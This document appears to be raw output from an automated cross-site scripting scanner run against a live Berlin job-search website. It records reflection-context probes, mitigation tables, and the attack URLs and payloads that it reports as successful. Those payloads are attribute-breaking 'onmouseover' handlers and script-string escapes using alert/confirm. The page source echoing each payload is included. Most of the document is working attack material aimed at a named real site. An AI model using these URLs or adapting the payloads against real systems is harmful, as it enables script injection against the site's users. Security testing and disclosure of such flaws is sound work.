&quot;formActionResultlistMobile&quot;:&quot;resultlist.dspResultList&quot;,&quot;formActionDetails&quot;:&quot;/ergebnisliste.html&quot;,&quot;advancedSearch&quot;:&quot;&quot;,&quot;formActionResultlist&quot;:&quot;/&quot;},&quot;showAdvancedSearchLink&quot;:true,&quot;focusWhatField&quot;:false,&quot;isMobile&quot;:false,&quot;autoSuggestValues&quot;:[],&quot;DISALLOWEMPTYSEARCH&quot;:false,&quot;WHATVALUE&quot;:&quot;' onmouseover='alert`1`&quot;,&quot;RADIUSVALUEFORLABEL&quot;:30,&quot;homeOfficeQuickFilterEnabled&quot;:false,&quot;autosuggestSkillsEnabled&quot;:true,&quot;WHEREVALUE&quot;:&quot;Berlin&quot;,&quot;showQuickFilters&quot;:false}" >
<input type="search" name="ke"
class="form-control typeahead search-box__field search-box__field-what" placeholder="Jobtitel, Kompetenz oder Firmenname" value="
' onmouseover='alert`1`"
autocomplete="off" data-search-box-what
data-search-box-placeholder data-search-box-autosuggest-type="jd,company_cp,skill_facet">
Mitigation        "	'	<	/ 
HTML:		True	False	True	False
	Script-Single	Encapsulated With Double Quotes: Can't Break the Context
Mitigation        "	'	<	/ 
SCRIPT:		False	True	True	False

Attack Payloads for SCRIPT
['"; confirm`1`; "']

SCRIPT Attack Url: https://jobs.berlin.de/?stf=freeText&ns=1&qs=[]&companyID=0&cityID=0&sourceOfTheSearchField=resultlistpage:general&searchOrigin=Resultlist_top-search&ke="; confirm`1`; "&ws=Berlin

 ______Detection  UnSuccessful with payload: "; confirm`1`; "

Mitigation        "	'	<	/ 
SCRIPT:		False	False	True	False

Attack Payloads for SCRIPT
['"; confirm`1`; "', "'; confirm`1`; '"]

SCRIPT Attack Url: https://jobs.berlin.de/?stf=freeText&ns=1&qs=[]&companyID=0&cityID=0&sourceOfTheSearchField=resultlistpage:general&searchOrigin=Resultlist_top-search&ke="; confirm`1`; "&ws=Berlin

 ______Detection  UnSuccessful with payload: "; confirm`1`; "


SCRIPT Attack Url: https://jobs.berlin.de/?stf=freeText&ns=1&qs=[]&companyID=0&cityID=0&sourceOfTheSearchField=resultlistpage:general&searchOrigin=Resultlist_top-search&ke='; confirm`1`; '&ws=Berlin

=>Detection  Successful with Payload: '; confirm`1`; '

FINAL OUTPUT: 
<script type="text/javascript">
        var utag_data = {"resultlist__filter_experience_ids":"","page__dynatrace_page_name_device":"resultlist-search-desktop","jobagent__ab_test":"_","page__datalayer_hash_id":"58667128-BC37-49B6-8AFC4BD6BFA276FA","page__country":"DE","datalayer__version":"3.1","resultlist__results_number_total":"0","resultlist__filter_worktype_ids":"","resultlist__filter_sector_ids_abr":"","resultlist__results_number_onpage":0,"candidate__login_status":"anonymous","resultlist__filter_city_ids":"","page__dev_environment":"live","resultlist__keyword_what_50char":"'; confirm`1`; '","resultlist__filter_sector_ids":"","resultlist__filter_contracttype_ids_abr":"","jobagent__ab_test_name":"","resultlist__filter_skill_ids":"","resultlist__keyword_where_30char":"Berlin","page_type":"resultlist-search","resultlist__filter_worktype_ids_abr":"","resultlist__results_number_regional":0,"resultlist__searchandmatch_query_feedback":"-|-|-_0|0|-_0_0_-_-_0_0","resultlist__keyword_what":"'; confirm`1`; '","resultlist__filter_region_ids_abr":"","page__platform_code_version":"V52-RWD","resultlist__language":"","ssa__suid":"c97f5516-0058-439f-b416-3cfa4da2fff1","resultlist__results_number_semantic":0,"resultlist__radius":30,"recommender__type":"","candidate__login_source":"","appversion_patch":"1","jobagent__events":[],"user__abtest_version":"","page__section_level1":"candidate","resultlist__listings_visibility_features":"no highlighted, no sponsored, no visited, no salary snippet, no skills","resultlist__page_number":1,"resultlist__type":"search","user__device_type_detected":"desktop","page__section_level2":"search","page__platform_device_type":"responsiveweb","resultlist__listing_values_top10":[],"resultlist__listing_ids":"","resultlist__listing_ids_30val":"","resultlist__filter_skill_ids_abr":"","appversion_source":"release-RM-697","appversion":"5.847.1.2","resultlist__filter_subcategory_ids_abr":"","page__server_id":"live/14.114/tomcat","resultlist__filter_contracttype_ids":"","resultlist__sorting_type":"relevance","candidate__em_hash":"","resultlist__events":["search_number_of_results","search_no_result"],"page__page_type":"resultlist-search","resultlist__filter_category_ids_abr":"","candidate__recognized_id":"","resultlist__keyword_where":"Berlin","resultlist__source_of_search":"Entry","resultlist__filter_subcategory_ids":"","appversion_minor":"847","resultlist__results_number_recommender":0,"resultlist__sorting_type_abr":"r","resultlist__filter_region_ids":"","resultlist__results_number_perpage":25,"event_name":"jobagent__-resultlist__search_number_of_results_search_no_result-discovery__-candidate__[]","resultlist__filter_names_abr":"fs_wf_-_-_-_-_-_-_-_-_-_-_ra_-_-","user__device_serverside_detected":"desktop","page__language":"DE","resultlist__results_number_mainsection":0,"page__site_id":"stepstone-de-berlin-de","resultlist__filter_city_ids_abr":"","appversion_build":"2","discovery__events":"","appversion_major":"5","resultlist__details_view_type":"small","jobagent__selected_criteria":"","jobagent__ab_test_variant":"","candidate__events":"[]","resultlist__filter_names":"what-freetext_where-freetext_-_-_-_-_-_-_-_-_-_-_radius_-_-","user__experiments_assignments":"","resultlist__filter_names_dyn_var":"fs_wf_-_-_-_-_-_-_-_-_-_-_ra_-_-","page__pagename":"Resultlist Responsive","resultlist__filter_experience_ids_abr":"","user__notification_experiments_assignments":"","resultlist__filter_category_ids":"","candidate__candidate_id":""};
    </script>
<script type="text/javascript">
        var utag_data = {"resultlist__filter_experience_ids":"","page__dynatrace_page_name_device":"resultlist-search-desktop","jobagent__ab_test":"_","page__datalayer_hash_id":"58667128-BC37-49B6-8AFC4BD6BFA276FA","page__country":"DE","datalayer__version":"3.1","resultlist__results_number_total":"0","resultlist__filter_worktype_ids":"","resultlist__filter_sector_ids_abr":"","resultlist__results_number_onpage":0,"candidate__login_status":"anonymous","resultlist__filter_city_ids":"","page__dev_environment":"live","resultlist__keyword_what_50char":"'; confirm`1`; '","resultlist__filter_sector_ids":"","resultlist__filter_contracttype_ids_abr":"","jobagent__ab_test_name":"","resultlist__filter_skill_ids":"","resultlist__keyword_where_30char":"Berlin","page_type":"resultlist-search","resultlist__filter_worktype_ids_abr":"","resultlist__results_number_regional":0,"resultlist__searchandmatch_query_feedback":"-|-|-_0|0|-_0_0_-_-_0_0","resultlist__keyword_what":"'; confirm`1`; '","resultlist__filter_region_ids_abr":"","page__platform_code_version":"V52-RWD","resultlist__language":"","ssa__suid":"c97f5516-0058-439f-b416-3cfa4da2fff1","resultlist__results_number_semantic":0,"resultlist__radius":30,"recommender__type":"","candidate__login_source":"","appversion_patch":"1","jobagent__events":[],"user__abtest_version":"","page__section_level1":"candidate","resultlist__listings_visibility_features":"no highlighted, no sponsored, no visited, no salary snippet, no skills","resultlist__page_number":1,"resultlist__type":"search","user__device_type_detected":"desktop","page__section_level2":"search","page__platform_device_type":"responsiveweb","resultlist__listing_values_top10":[],"resultlist__listing_ids":"","resultlist__listing_ids_30val":"","resultlist__filter_skill_ids_abr":"","appversion_source":"release-RM-697","appversion":"5.847.1.2","resultlist__filter_subcategory_ids_abr":"","page__server_id":"live/14.114/tomcat","resultlist__filter_contracttype_ids":"","resultlist__sorting_type":"relevance","candidate__em_hash":"","resultlist__events":["search_number_of_results","search_no_result"],"page__page_type":"resultlist-search","resultlist__filter_category_ids_abr":"","candidate__recognized_id":"","resultlist__keyword_where":"Berlin","resultlist__source_of_search":"Entry","resultlist__filter_subcategory_ids":"","appversion_minor":"847","resultlist__results_number_recommender":0,"resultlist__sorting_type_abr":"r","resultlist__filter_region_ids":"","resultlist__results_number_perpage":25,"event_name":"jobagent__-resultlist__search_number_of_results_search_no_result-discovery__-candidate__[]","resultlist__filter_names_abr":"fs_wf_-_-_-_-_-_-_-_-_-_-_ra_-_-","user__device_serverside_detected":"desktop","page__language":"DE","resultlist__results_number_mainsection":0,"page__site_id":"stepstone-de-berlin-de","resultlist__filter_city_ids_abr":"","appversion_build":"2","discovery__events":"","appversion_major":"5","resultlist__details_view_type":"small","jobagent__selected_criteria":"","jobagent__ab_test_variant":"","candidate__events":"[]","resultlist__filter_names":"what-freetext_where-freetext_-_-_-_-_-_-_-_-_-_-_radius_-_-","user__experiments_assignments":"","resultlist__filter_names_dyn_var":"fs_wf_-_-_-_-_-_-_-_-_-_-_ra_-_-","page__pagename":"Resultlist Responsive","resultlist__filter_experience_ids_abr":"","user__notification_experiments_assignments":"","resultlist__filter_category_ids":"","candidate__candidate_id":""};
    </script>
Mitigation        "	'	<	/ 
URL:		False	False	True	True
_______________________________________________________________________________________________________
https://jobs.berlin.de/?stf=freeText&ns=1&qs=[]&companyID=0&cityID=0&sourceOfTheSearchField=resultlistpage:general&searchOrigin=Resultlist_top-search&ke=&ws=/uvw"xyz'yxz<zxy

----------------------------------------------------------------------------------
Attribute Context: [3]
<form class="" name="SearchBoxName"
method="GET" action="/" data-search-box="{&quot;siteCountry&quot;:&quot;de&quot;,&quot;language&quot;:&quot;de&quot;,&quot;isExpanded&quot;:true,&quot;HOMEPAGEANDHEADERVARIANT&quot;:null,&quot;quickFilters&quot;:{&quot;workTypeValues&quot;:{&quot;partTime&quot;:80002,&quot;homeOffice&quot;:80005,&quot;fullTime&quot;:80001}},&quot;suid&quot;:&quot;a715917d-f3a8-49c7-b92d-9e24eef02125&quot;,&quot;disallowEmptySearchWithRecentSearches&quot;:false,&quot;RADIUSVALUE&quot;:30,&quot;searchOrigin&quot;:&quot;Resultlist_top-search&quot;,&quot;autosuggest&quot;:{&quot;typeTranslations&quot;:{&quot;postalcode&quot;:&quot;&quot;,&quot;company&quot;:&quot;Firma&quot;,&quot;keyword&quot;:&quot;&quot;,&quot;company_cp&quot;:&quot;Firma&quot;,&quot;jobid&quot;:&quot;&quot;,&quot;category&quot;:&quot;&quot;,&quot;geocity&quot;:&quot;&quot;,&quot;skill_facet&quot;:&quot;Kompetenz&quot;,&quot;jd&quot;:&quot;&quot;},&quot;enabled&quot;:true,&quot;queryParamValues&quot;:{&quot;companyType&quot;:false},&quot;type&quot;:&quot;jd,company_cp,skill_facet&quot;},&quot;radius&quot;:{&quot;enabled&quot;:true,&quot;options&quot;:{&quot;values&quot;:[5,10,20,30,40,50,75,100],&quot;defaultIndex&quot;:4}},&quot;showDetailedResultList&quot;:false,&quot;SINGLESEARCHASSISTANT&quot;:{&quot;isAvailable&quot;:false,&quot;displayThreshold&quot;:10,&quot;tooltipTheme&quot;:&quot;stepstone&quot;},&quot;links&quot;:{&quot;formAction&quot;:&quot;/&quot;,&quot;formActionCompany&quot;:&quot;/stellenanzeigen-arbeitgeber.html&quot;,&quot;formActionResultlistMobile&quot;:&quot;resultlist.dspResultList&quot;,&quot;formActionDetails&quot;:&quot;/ergebnisliste.html&quot;,&quot;advancedSearch&quot;:&quot;&quot;,&quot;formActionResultlist&quot;:&quot;/&quot;},&quot;showAdvancedSearchLink&quot;:true,&quot;focusWhatField&quot;:false,&quot;isMobile&quot;:false,&quot;autoSuggestValues&quot;:[],&quot;DISALLOWEMPTYSEARCH&quot;:false,&quot;WHATVALUE&quot;:&quot;&quot;,&quot;RADIUSVALUEFORLABEL&quot;:30,&quot;homeOfficeQuickFilterEnabled&quot;:false,&quot;autosuggestSkillsEnabled&quot;:true,&quot;WHEREVALUE&quot;:&quot;/uvw\&quot;xyz'yxz zxy&quot;,&quot;showQuickFilters&quot;:false}" >
<input type="search" name="ws"
class="form-control typeahead search-box__field search-box__field-where" placeholder="Ort oder 5-stellige PLZ" value="/uvw&quot;xyz'yxz zxy"
autocomplete="off" data-search-box-where data-search-box-placeholder>
<div
data-jobagentmodal-ajax-url="//jobs.berlin.de/5/index.cfm?event=resultlistpage:resultlistjobagentajaxviewlet.showPopover&lang=de&stf=freeText&ns=1&qs=[]&companyID=0&cityID=0&sourceOfTheSearchField=resultlistpage:general&searchOrigin=Resultlist_top-search&ke=&ws=/uvw"xyz'yxz<zxy&numberOfOffers=0"
data-jobagentmodal-base-ajax-url="//jobs.berlin.de/5/index.cfm?event=resultlistpage:resultlistjobagentajaxviewlet.showPopover&"
data-jobagentmodal
>

----------------------------------------------------------------------------------
HTML Context: [1]
<strong>/uvw&amp;quot;xyz'yxz zxy</strong>

----------------------------------------------------------------------------------
Script Context: [2]
<script type="text/javascript">
        var utag_data = {"resultlist__filter_experience_ids":"","page__dynatrace_page_name_device":"resultlist-search-desktop","jobagent__ab_test":"_","page__datalayer_hash_id":"EAE45F02-4E4F-430A-8F91B6ACA83BD35D","page__country":"DE","datalayer__version":"3.1","resultlist__results_number_total":"0","resultlist__filter_worktype_ids":"","resultlist__filter_sector_ids_abr":"","resultlist__results_number_onpage":0,"candidate__login_status":"anonymous","resultlist__filter_city_ids":"","page__dev_environment":"live","resultlist__keyword_what_50char":"","resultlist__filter_sector_ids":"","resultlist__filter_contracttype_ids_abr":"","jobagent__ab_test_name":"","resultlist__filter_skill_ids":"","resultlist__keyword_where_30char":"/uvw\"xyz'yxz zxy","user__abtest_ticket":"BLACKLIST","page_type":"resultlist-search","resultlist__filter_worktype_ids_abr":"","resultlist__results_number_regional":0,"resultlist__searchandmatch_query_feedback":"-|-|-_0|0|-_0_0_-_-_0_0","resultlist__keyword_what":"","resultlist__filter_region_ids_abr":"","resultlist__language":"","page__platform_code_version":"V52-RWD","ssa__suid":"a715917d-f3a8-49c7-b92d-9e24eef02125","resultlist__results_number_semantic":0,"resultlist__radius":30,"recommender__type":"","candidate__login_source":"","appversion_patch":"1","jobagent__events":[],"user__abtest_version":"A_BLACKLIST","page__section_level1":"candidate","resultlist__listings_visibility_features":"no highlighted, no sponsored, no visited, no salary snippet, no skills","resultlist__page_number":1,"resultlist__type":"search","user__device_type_detected":"bot","page__section_level2":"search","page__platform_device_type":"responsiveweb","resultlist__listing_values_top10":[],"resultlist__listing_ids":"","resultlist__listing_ids_30val":"","resultlist__filter_skill_ids_abr":"","appversion_source":"release-RM-697","appversion":"5.847.1.2","resultlist__filter_subcategory_ids_abr":"","page__server_id":"live/14.164/tomcat","resultlist__filter_contracttype_ids":"","resultlist__sorting_type":"published","candidate__em_hash":"","resultlist__events":["search_number_of_results","search_no_result"],"page__page_type":"resultlist-search","resultlist__filter_category_ids_abr":"","candidate__recognized_id":"","resultlist__keyword_where":"/uvw\"xyz'yxz zxy","resultlist__source_of_search":"Entry","resultlist__filter_subcategory_ids":"","appversion_minor":"847","resultlist__results_number_recommender":0,"resultlist__sorting_type_abr":"p","resultlist__filter_region_ids":"","resultlist__results_number_perpage":25,"event_name":"jobagent__-resultlist__search_number_of_results_search_no_result-discovery__-candidate__[]","resultlist__filter_names_abr":"-_wf_-_-_-_-_-_-_-_-_-_-_ra_-_-","user__device_serverside_detected":"desktop","page__language":"DE","resultlist__results_number_mainsection":0,"page__site_id":"stepstone-de-berlin-de","resultlist__filter_city_ids_abr":"","appversion_build":"2","discovery__events":"","appversion_major":"5","resultlist__details_view_type":"small","jobagent__selected_criteria":"","jobagent__ab_test_variant":"","candidate__events":"[]","resultlist__filter_names":"-_where-freetext_-_-_-_-_-_-_-_-_-_-_radius_-_-","user__experiments_assignments":"A_BLACKLIST","resultlist__filter_names_dyn_var":"-_wf_-_-_-_-_-_-_-_-_-_-_ra_-_-","page__pagename":"Resultlist Responsive","resultlist__filter_experience_ids_abr":"","user__notification_experiments_assignments":"","resultlist__filter_category_ids":"","candidate__candidate_id":""};
    </script>
<script type="text/javascript">
	var uxTools = {};
	uxTools.variantName = "";
	uxTools.testName = "";
	uxTools.reference = "";
	uxTools.hostName = "jobs.berlin.de";
	uxTools.queryString = "event=resultlistpage:general.index&amp;lang=de&amp;stf=freeText&amp;ns=1&amp;qs=[]&amp;companyID=0&amp;cityID=0&amp;sourceOfTheSearchField=resultlistpage:general&amp;searchOrigin=Resultlist_top-search&amp;ke=&amp;ws=/uvw&quot;xyz'yxz&lt;zxy";
	
		uxTools.protocol = "https";
	
	uxTools.currentEvent = "resultlistpage:general.index";
	uxTools.currentHandler = "resultlistpage:general";
	uxTools.applicationName = "v5";
</script>

----------------------------------------------------------------------------------
URI Context: [0]

----------------------------------------------------------------------------------

	Attr-Single	Encapsulated With Double Quotes: Can't Break the Context
Mitigation        "	'	<	/ 
ATTR:		False	True	True	False

Attack Payloads for ATTR
['" onmouseover="alert`1`']

ATTR Attack Url: https://jobs.berlin.de/?stf=freeText&ns=1&qs=[]&companyID=0&cityID=0&sourceOfTheSearchField=resultlistpage:general&searchOrigin=Resultlist_top-search&ke=&ws=" onmouseover="alert`1`

 ______Detection  UnSuccessful with payload: " onmouseover="alert`1`

	Attr-Single	Encapsulated With Double Quotes: Can't Break the Context
Mitigation        "	'	<	/ 
ATTR:		False	True	True	False

Attack Payloads for ATTR
['" onmouseover="alert`1`']

ATTR Attack Url: https://jobs.berlin.de/?stf=freeText&ns=1&qs=[]&companyID=0&cityID=0&sourceOfTheSearchField=resultlistpage:general&searchOrigin=Resultlist_top-search&ke=&ws=" onmouseover="alert`1`

 ______Detection  UnSuccessful with payload: " onmouseover="alert`1`

Mitigation        "	'	<	/ 
ATTR:		False	False	False	False

Attack Payloads for ATTR
['" onmouseover="alert`1`', "' onmouseover='alert`1`"]

ATTR Attack Url: https://jobs.berlin.de/?stf=freeText&ns=1&qs=[]&companyID=0&cityID=0&sourceOfTheSearchField=resultlistpage:general&searchOrigin=Resultlist_top-search&ke=&ws=" onmouseover="alert`1`

 ______Detection  UnSuccessful with payload: " onmouseover="alert`1`


ATTR Attack Url: https://jobs.berlin.de/?stf=freeText&ns=1&qs=[]&companyID=0&cityID=0&sourceOfTheSearchField=resultlistpage:general&searchOrigin=Resultlist_top-search&ke=&ws=' onmouseover='alert`1`

=>Detection  Successful with Payload: ' onmouseover='alert`1`
	Attr-Single	Encapsulated With Double Quotes: Can't Break the Context
	Attr-Single	Encapsulated With Double Quotes: Can't Break the Context

FINAL OUTPUT: 
<form class="" name="SearchBoxName"
method="GET" action="/" data-search-box="{&quot;siteCountry&quot;:&quot;de&quot;,&quot;language&quot;:&quot;de&quot;,&quot;HOMEPAGEANDHEADERVARIANT&quot;:null,&quot;quickFilters&quot;:{&quot;workTypeValues&quot;:{&quot;partTime&quot;:80002,&quot;homeOffice&quot;:80005,&quot;fullTime&quot;:80001}},&quot;suid&quot;:&quot;ae78178c-4614-4dc0-a1b4-baa16fb8b20d&quot;,&quot;disallowEmptySearchWithRecentSearches&quot;:false,&quot;RADIUSVALUE&quot;:30,&quot;searchOrigin&quot;:&quot;Resultlist_top-search&quot;,&quot;autosuggest&quot;:{&quot;typeTranslations&quot;:{&quot;postalcode&quot;:&quot;&quot;,&quot;company&quot;:&quot;Firma&quot;,&quot;keyword&quot;:&quot;&quot;,&quot;company_cp&quot;:&quot;Firma&quot;,&quot;jobid&quot;:&quot;&quot;,&quot;category&quot;:&quot;&quot;,&quot;geocity&quot;:&quot;&quot;,&quot;skill_facet&quot;:&quot;Kompetenz&quot;,&quot;jd&quot;:&quot;&quot;},&quot;enabled&quot;:true,&quot;queryParamValues&quot;:{&quot;companyType&quot;:false},&quot;type&quot;:&quot;jd,company_cp,skill_facet&quot;},&quot;radius&quot;:{&quot;enabled&quot;:true,&quot;options&quot;:{&quot;values&quot;:[5,10,20,30,40,50,75,100],&quot;defaultIndex&quot;:4}},&quot;showDetailedResultList&quot;:false,&quot;SINGLESEARCHASSISTANT&quot;:{&quot;isAvailable&quot;:false,&quot;displayThreshold&quot;:10,&quot;tooltipTheme&quot;:&quot;stepstone&quot;},&quot;links&quot;:{&quot;formAction&quot;:&quot;/&quot;,&quot;formActionCompany&quot;:&quot;/stellenanzeigen-arbeitgeber.html&quot;,&quot;formActionResultlistMobile&quot;:&quot;resultlist.dspResultList&quot;,&quot;formActionDetails&quot;:&quot;/ergebnisliste.html&quot;,&quot;advancedSearch&quot;:&quot;&quot;,&quot;formActionResultlist&quot;:&quot;/&quot;},&quot;showAdvancedSearchLink&quot;:true,&quot;focusWhatField&quot;:false,&quot;ISMOBILE&quot;:false,&quot;autoSuggestValues&quot;:[],&quot;DISALLOWEMPTYSEARCH&quot;:false,&quot;WHATVALUE&quot;:&quot;&quot;,&quot;RADIUSVALUEFORLABEL&quot;:30,&quot;homeOfficeQuickFilterEnabled&quot;:false,&quot;autosuggestSkillsEnabled&quot;:true,&quot;WHEREVALUE&quot;:&quot;' onmouseover='alert`1`&quot;,&quot;showQuickFilters&quot;:false}" >
<input type="search" name="ws"
class="form-control typeahead search-box__field search-box__field-where" placeholder="Ort oder 5-stellige PLZ" value="' onmouseover='alert`1`"
autocomplete="off" data-search-box-where data-search-box-placeholder>
Mitigation        "	'	<	/ 
HTML:		True	False	True	False
	Script-Single	Encapsulated With Double Quotes: Can't Break the Context
Mitigation        "	'	<	/ 
SCRIPT:		False	True	True	False

Attack Payloads for SCRIPT
['"; confirm`1`; "']

SCRIPT Attack Url: https://jobs.berlin.de/?stf=freeText&ns=1&qs=[]&companyID=0&cityID=0&sourceOfTheSearchField=resultlistpage:general&searchOrigin=Resultlist_top-search&ke=&ws="; confirm`1`; "

 ______Detection  UnSuccessful with payload: "; confirm`1`; "

Mitigation        "	'	<	/ 
SCRIPT:		False	False	True	False

Attack Payloads for SCRIPT
['"; confirm`1`; "', "'; confirm`1`; '"]

SCRIPT Attack Url: https://jobs.berlin.de/?stf=freeText&ns=1&qs=[]&companyID=0&cityID=0&sourceOfTheSearchField=resultlistpage:general&searchOrigin=Resultlist_top-search&ke=&ws="; confirm`1`; "

 ______Detection  UnSuccessful with payload: "; confirm`1`; "


SCRIPT Attack Url: https://jobs.berlin.de/?stf=freeText&ns=1&qs=[]&companyID=0&cityID=0&sourceOfTheSearchField=resultlistpage:general&searchOrigin=Resultlist_top-search&ke=&ws='; confirm`1`; '

=>Detection  Successful with Payload: '; confirm`1`; '

FINAL OUTPUT: 
<script type="text/javascript">
        var utag_data = {"resultlist__filter_experience_ids":"","page__dynatrace_page_name_device":"resultlist-search-desktop","jobagent__ab_test":"_","page__datalayer_hash_id":"47864E6E-8002-4163-B061DF03ED05CFAD","page__country":"DE","datalayer__version":"3.1","resultlist__results_number_total":8476,"resultlist__filter_worktype_ids":"","resultlist__filter_sector_ids_abr":"","resultlist__results_number_onpage":25,"candidate__login_status":"anonymous","resultlist__filter_city_ids":"","page__dev_environment":"live","resultlist__keyword_what_50char":"","resultlist__filter_sector_ids":"","resultlist__filter_contracttype_ids_abr":"","jobagent__ab_test_name":"","resultlist__filter_skill_ids":"","resultlist__keyword_where_30char":"'; confirm`1`; '","page_type":"resultlist-search","resultlist__filter_worktype_ids_abr":"","resultlist__results_number_regional":1485,"resultlist__searchandmatch_query_feedback":"-|-|-_0|1485|-_0_0_-_-_0_0","resultlist__keyword_what":"","resultlist__filter_region_ids_abr":"","page__platform_code_version":"V52-RWD","resultlist__language":"","ssa__suid":"9d6d6e2a-f14d-413b-af0f-96a4849cf2d7","resultlist__results_number_semantic":0,"resultlist__radius":30,"recommender__type":"","candidate__login_source":"","appversion_patch":"1","jobagent__events":[],"user__abtest_version":"","page__section_level1":"candidate","resultlist__listings_visibility_features":"no highlighted, no sponsored, no visited, no salary snippet, no skills","resultlist__page_number":1,"resultlist__type":"search","user__device_type_detected":"desktop","page__section_level2":"search","page__platform_device_type":"responsiveweb","resultlist__listing_values_top10":[1,1,1,1,1,1,1,1,1,1],"resultlist__listing_ids":"6387657,6384298,6469558,6486626,6486634,6002588,6453905,6385957,6486620,6415785,6416974,6345706,6268290,6345705,6486613,6469568,5775482,6345719,6268287,5999868,6268181,6345716,6415938,6415935,6415831","resultlist__listing_ids_30val":"6387657,6384298,6469558,6486626,6486634,6002588,6453905,6385957,6486620,6415785,6416974,6345706,6268290,6345705,6486613,6469568,5775482,6345719,6268287,5999868,6268181,6345716,6415938,6415935,6415831","resultlist__filter_skill_ids_abr":"","appversion_source":"release-RM-697","appversion":"5.847.1.2","resultlist__filter_subcategory_ids_abr":"","page__server_id":"live/142.96/tomcat","resultlist__filter_contracttype_ids":"","resultlist__sorting_type":"published","candidate__em_hash":"","resultlist__events":["search_number_of_results","search_with_result"],"page__page_type":"resultlist-search","resultlist__filter_category_ids_abr":"","candidate__recognized_id":"","resultlist__keyword_where":"'; confirm`1`; '","resultlist__source_of_search":"Entry","resultlist__filter_subcategory_ids":"","appversion_minor":"847","resultlist__results_number_recommender":0,"resultlist__sorting_type_abr":"p","resultlist__filter_region_ids":"","resultlist__results_number_perpage":25,"event_name":"jobagent__-resultlist__search_number_of_results_search_with_result-discovery__-candidate__[]","resultlist__filter_names_abr":"-_wf_-_-_-_-_-_-_-_-_-_-_ra_-_-","user__device_serverside_detected":"desktop","page__language":"DE","resultlist__results_number_mainsection":6991,"page__site_id":"stepstone-de-berlin-de","resultlist__filter_city_ids_abr":"","appversion_build":"2","discovery__events":"","appversion_major":"5","resultlist__details_view_type":"small","jobagent__selected_criteria":"","jobagent__ab_test_variant":"","candidate__events":"[]","resultlist__filter_names":"-_where-freetext_-_-_-_-_-_-_-_-_-_-_radius_-_-","user__experiments_assignments":"","resultlist__filter_names_dyn_var":"-_wf_-_-_-_-_-_-_-_-_-_-_ra_-_-","page__pagename":"Resultlist Responsive","resultlist__filter_experience_ids_abr":"","user__notification_experiments_assignments":"","resultlist__filter_category_ids":"","candidate__candidate_id":""};
    </script>
<script type="text/javascript">
        var utag_data = {"resultlist__filter_experience_ids":"","page__dynatrace_page_name_device":"resultlist-search-desktop","jobagent__ab_test":"_","page__datalayer_hash_id":"47864E6E-8002-4163-B061DF03ED05CFAD","page__country":"DE","datalayer__version":"3.1","resultlist__results_number_total":8476,"resultlist__filter_worktype_ids":"","resultlist__filter_sector_ids_abr":"","resultlist__results_number_onpage":25,"candidate__login_status":"anonymous","resultlist__filter_city_ids":"","page__dev_environment":"live","resultlist__keyword_what_50char":"","resultlist__filter_sector_ids":"","resultlist__filter_contracttype_ids_abr":"","jobagent__ab_test_name":"","resultlist__filter_skill_ids":"","resultlist__keyword_where_30char":"'; confirm`1`; '","page_type":"resultlist-search","resultlist__filter_worktype_ids_abr":"","resultlist__results_number_regional":1485,"resultlist__searchandmatch_query_feedback":"-|-|-_0|1485|-_0_0_-_-_0_0","resultlist__keyword_what":"","resultlist__filter_region_ids_abr":"","page__platform_code_version":"V52-RWD","resultlist__language":"","ssa__suid":"9d6d6e2a-f14d-413b-af0f-96a4849cf2d7","resultlist__results_number_semantic":0,"resultlist__radius":30,"recommender__type":"","candidate__login_source":"","appversion_patch":"1","jobagent__events":[],"user__abtest_version":"","page__section_level1":"candidate","resultlist__listings_visibility_features":"no highlighted, no sponsored, no visited, no salary snippet, no skills","resultlist__page_number":1,"resultlist__type":"search","user__device_type_detected":"desktop","page__section_level2":"search","page__platform_device_type":"responsiveweb","resultlist__listing_values_top10":[1,1,1,1,1,1,1,1,1,1],"resultlist__listing_ids":"6387657,6384298,6469558,6486626,6486634,6002588,6453905,6385957,6486620,6415785,6416974,6345706,6268290,6345705,6486613,6469568,5775482,6345719,6268287,5999868,6268181,6345716,6415938,6415935,6415831","resultlist__listing_ids_30val":"6387657,6384298,6469558,6486626,6486634,6002588,6453905,6385957,6486620,6415785,6416974,6345706,6268290,6345705,6486613,6469568,5775482,6345719,6268287,5999868,6268181,6345716,6415938,6415935,6415831","resultlist__filter_skill_ids_abr":"","appversion_source":"release-RM-697","appversion":"5.847.1.2","resultlist__filter_subcategory_ids_abr":"","page__server_id":"live/142.96/tomcat","resultlist__filter_contracttype_ids":"","resultlist__sorting_type":"published","candidate__em_hash":"","resultlist__events":["search_number_of_results","search_with_result"],"page__page_type":"resultlist-search","resultlist__filter_category_ids_abr":"","candidate__recognized_id":"","resultlist__keyword_where":"'; confirm`1`; '","resultlist__source_of_search":"Entry","resultlist__filter_subcategory_ids":"","appversion_minor":"847","resultlist__results_number_recommender":0,"resultlist__sorting_type_abr":"p","resultlist__filter_region_ids":"","resultlist__results_number_perpage":25,"event_name":"jobagent__-resultlist__search_number_of_results_search_with_result-discovery__-candidate__[]","resultlist__filter_names_abr":"-_wf_-_-_-_-_-_-_-_-_-_-_ra_-_-","user__device_serverside_detected":"desktop","page__language":"DE","resultlist__results_number_mainsection":6991,"page__site_id":"stepstone-de-berlin-de","resultlist__filter_city_ids_abr":"","appversion_build":"2","discovery__events":"","appversion_major":"5","resultlist__details_view_type":"small","jobagent__selected_criteria":"","jobagent__ab_test_variant":"","candidate__events":"[]","resultlist__filter_names":"-_where-freetext_-_-_-_-_-_-_-_-_-_-_radius_-_-","user__experiments_assignments":"","resultlist__filter_names_dyn_var":"-_wf_-_-_-_-_-_-_-_-_-_-_ra_-_-","page__pagename":"Resultlist Responsive","resultlist__filter_experience_ids_abr":"","user__notification_experiments_assignments":"","resultlist__filter_category_ids":"","candidate__candidate_id":""};
    </script>
